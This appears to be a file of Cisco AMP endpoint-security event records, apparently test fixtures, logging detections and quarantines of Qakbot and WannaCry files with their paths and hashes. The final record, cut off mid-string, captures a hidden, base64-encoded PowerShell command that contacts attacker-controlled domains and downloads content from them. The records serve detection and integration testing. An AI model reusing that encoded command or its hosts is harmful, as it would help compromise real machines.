+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411525251028484000,"timestamp":1610643578,"timestamp_nanoseconds":183000000,"date":"2021-01-14T16:59:38+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6411525251028484104","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"81.2.69.144","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"MspthrdHash.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\MspthrdHash\\MspthrdHash.exe","identity":{"sha256":"bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff","sha1":"8cf0ca99a8f5019d8583133b9a9379299c45470c","md5":"6894b3834bd541fa85df79e44568acac"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411525251028484000,"timestamp":1610643578,"timestamp_nanoseconds":698000000,"date":"2021-01-14T16:59:38+00:00","event_type":"Threat 
Quarantined","event_type_id":553648143,"detection_id":"6411525251028484104","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419264043361501000,"timestamp":1610643347,"timestamp_nanoseconds":888000000,"date":"2021-01-14T16:55:47+00:00","event_type":"Retrospective Quarantine Attempt Failed","event_type_id":2164260893,"detection_id":"6419264043361501262","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25"}}}} 
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419264043361501000,"timestamp":1610643347,"timestamp_nanoseconds":779000000,"date":"2021-01-14T16:55:47+00:00","event_type":"Retrospective Quarantine Attempt Failed","event_type_id":2164260893,"detection_id":"6419229331435814969","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419264043361501000,"timestamp":1610643347,"timestamp_nanoseconds":716000000,"date":"2021-01-14T16:55:47+00:00","event_type":"Retrospective Quarantine Attempt Failed","event_type_id":2164260893,"detection_id":"6419204905956802579","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225524,"description":"Object name not 
found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419264043361501000,"timestamp":1610643347,"timestamp_nanoseconds":888000000,"date":"2021-01-14T16:55:47+00:00","event_type":"Retrospective Quarantine","event_type_id":553648155,"detection_id":"6419264043361501261","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25"}}}} 
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419264043361501000,"timestamp":1610643347,"timestamp_nanoseconds":872000000,"date":"2021-01-14T16:55:47+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.Ransom:Gen.20gl.1201","detection_id":"6419264043361501262","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"u.wnry","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\u.wnry","identity":{"sha256":"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419264043361501000,"timestamp":1610643347,"timestamp_nanoseconds":872000000,"date":"2021-01-14T16:55:47+00:00","event_type":"Retrospective 
Detection","event_type_id":553648147,"detection":"W32.Ransom:Gen.20gl.1201","detection_id":"6419264043361501261","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"@WanaDecryptor@.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\@WanaDecryptor@.exe","identity":{"sha256":"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25","sha1":"45356a9dd616ed7161a3b9192e2f318d0ab5ad10","md5":"7bf2b57f2a205768755c07f238fb32cc"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419264043361501000,"timestamp":1610643347,"timestamp_nanoseconds":763000000,"date":"2021-01-14T16:55:47+00:00","event_type":"Retrospective 
Detection","event_type_id":553648147,"detection":"W32.Ransom:Gen.20gl.1201","detection_id":"6419229331435814969","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"u.wnry","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\u.wnry","identity":{"sha256":"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419264043361501000,"timestamp":1610643347,"timestamp_nanoseconds":716000000,"date":"2021-01-14T16:55:47+00:00","event_type":"Retrospective 
Detection","event_type_id":553648147,"detection":"W32.Ransom:Gen.20gl.1201","detection_id":"6419204905956802579","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"u.wnry","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\u.wnry","identity":{"sha256":"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419264039066534000,"timestamp":1610643346,"timestamp_nanoseconds":718000000,"date":"2021-01-14T16:55:46+00:00","event_type":"Retrospective Quarantine Attempt Failed","event_type_id":2164260893,"detection_id":"6419229322845880359","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225761,"description":"Cannot 
delete"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419264039066534000,"timestamp":1610643346,"timestamp_nanoseconds":765000000,"date":"2021-01-14T16:55:46+00:00","event_type":"Retrospective Quarantine","event_type_id":553648155,"detection_id":"6419264039066533964","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} 
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419264039066534000,"timestamp":1610643346,"timestamp_nanoseconds":749000000,"date":"2021-01-14T16:55:46+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.Gen.20gl.1201","detection_id":"6419264039066533964","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mssecsvc.exe","file_path":"\\\\?\\C:\\Windows\\mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c","sha1":"61b9ae415fbe95bf4e6c616ce433cd20dce7dfe3","md5":"54a116ff80df6e6031059fc3036464df"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419264039066534000,"timestamp":1610643346,"timestamp_nanoseconds":702000000,"date":"2021-01-14T16:55:46+00:00","event_type":"Retrospective 
Detection","event_type_id":553648147,"detection":"W32.Gen.20gl.1201","detection_id":"6419229322845880359","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mssecsvc.exe","file_path":"\\\\?\\C:\\Windows\\mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c","sha1":"61b9ae415fbe95bf4e6c616ce433cd20dce7dfe3","md5":"54a116ff80df6e6031059fc3036464df"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412622782676337000,"timestamp":1610642101,"timestamp_nanoseconds":729000000,"date":"2021-01-14T16:35:01+00:00","event_type":"Retrospective Quarantine Attempt Failed","event_type_id":2164260893,"detection_id":"6412622782676336648","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225524,"description":"Object name not 
found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412622782676337000,"timestamp":1610642101,"timestamp_nanoseconds":729000000,"date":"2021-01-14T16:35:01+00:00","event_type":"Retrospective Quarantine Attempt Failed","event_type_id":2164260893,"detection_id":"6412622782676336647","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446"}}}} 
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412622782676337000,"timestamp":1610642101,"timestamp_nanoseconds":713000000,"date":"2021-01-14T16:35:01+00:00","event_type":"Retrospective Quarantine Attempt Failed","event_type_id":2164260893,"detection_id":"6412622782676336646","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412622782676337000,"timestamp":1610642101,"timestamp_nanoseconds":198000000,"date":"2021-01-14T16:35:01+00:00","event_type":"Retrospective 
Detection","event_type_id":553648147,"detection":"W32.D177E09A9A-95.SBX.TG","detection_id":"6412622782676336647","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"kepv86368.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\Temp\\kepv86368.exe","identity":{"sha256":"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412622782676337000,"timestamp":1610642101,"timestamp_nanoseconds":198000000,"date":"2021-01-14T16:35:01+00:00","event_type":"Retrospective 
Detection","event_type_id":553648147,"detection":"W32.D177E09A9A-95.SBX.TG","detection_id":"6412622782676336646","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"uqlq0o884.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\Temp\\uqlq0o884.exe","identity":{"sha256":"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412622782676337000,"timestamp":1610642101,"timestamp_nanoseconds":198000000,"date":"2021-01-14T16:35:01+00:00","event_type":"Retrospective 
Detection","event_type_id":553648147,"detection":"W32.D177E09A9A-95.SBX.TG","detection_id":"6412622782676336645","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"120C.tmp","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\Temp\\120C.tmp","identity":{"sha256":"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446","sha1":"f5a171c879b90e77861daf19741b373646d791ff","md5":"32c9e6737dbdcbfb7563a3f27e2b1571"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412622782676337000,"timestamp":1610642101,"timestamp_nanoseconds":183000000,"date":"2021-01-14T16:35:01+00:00","event_type":"Retrospective 
Detection","event_type_id":553648147,"detection":"W32.D177E09A9A-95.SBX.TG","detection_id":"6412622782676336644","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"QuotaGroup.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\QuotaGroup\\QuotaGroup.exe","identity":{"sha256":"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446","sha1":"92673dd0e5f4a094fa6cd57bb301f884f2289f6c","md5":"2f99e3456dc1d26f77c52b2119fde92f"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6880683125978957000,"timestamp":1610640884,"timestamp_nanoseconds":810000000,"date":"2021-01-14T16:14:44+00:00","event_type":"Threat Detection","event_type_id":553648222,"detection":"WMIPRVSE Launched Encoded Powershell 
Command","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_BP_WMIPRVSE","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"be:b0:d5:89:e2:96"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"bp_data":{"audit":false,"details":{"actions":[{"action":"end_process","end_ts":1602033881808,"params":["10724"],"start_ts":1602033881805,"status":"success"}],"eng_epoch":1,"eng_ver":"0.9.0.104","matched_activity":{"events":[{"process:start":{"app":"powershell.exe","app_path":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0","args":["powershell.exe","-NoP","-NonI","-W","Hidden","-E","JABzAGUAPQBAACgAJwB1AHAAZABhAHQAZQAuAHcAaQBuAGQAbwB3AHMAZABlAGYAZQBuAGQAZQByAGgAbwBzAHQALgBjAGwAdQBiACcALAAnAGkAbgBmAG8ALgB3AGkAbgBkAG8AdwBzAGQAZQBmAGUAbgBkAGUAcgBoAG8AcwB0AC4AYwBsAHUAYgAnACwAJwA4ADcALgAxADIAMQAuADkAOAAuADIAMQA1ACcAKQANAAoAJABuAGkAYwA9ACcAdwB3AHcALgB3AGkAbgBkAG8AdwBzAGQAZQBmAGUAbgBkAGUAcgBoAG8AcwB0AC4AYwBsAHUAYgAnAA0ACgBmAG8AcgBlAGEAYwBoACgAJAB0ACAAaQBuACAAJABzAGUAKQANAAoAewANAAoAIAAgACAAIAAkAHAAaQBuAD0AdABlAHMAdAAtAGMAbwBuAG4AZQBjAHQAaQBvAG4AIAAkAHQADQAKACAAIAAgACAAaQBmACAAKAAkAHAAaQBuACAALQBuAGUAIAAkAG4AdQBsAGwAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAJABuAGkAYwA9ACQAdAANAAoAIAAgACAAIAAgACAAIAAgAGIAcgBlAGEAawANAAoAIAAgACAAIAB9AA0ACgB9AA0ACgAkAG4AaQBjAD0AJABuAGkAYwArACIAOgA4ADAAMAAwACIADQAKACQAdgBlAHIAPQAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AJABuAGkAYwAvAHYAZQByAC4AdAB4AHQAIgApAC4AVAByAGkAbQAoACkAIAANAAoAaQBmACgAJAB2AGUAcgAgAC0AbgBlACAAJABuAHUAbABsACkAewAgAA0ACgAgACAAIAAgAGkAZgAoACQAdgBlAHIAIAAtAG4AZQAgACgAWwBXAG0AaQBDAGwAYQBzAHMAXQAgACcAcgBvAG8AdABcAGQAZQBmAGEAdQ
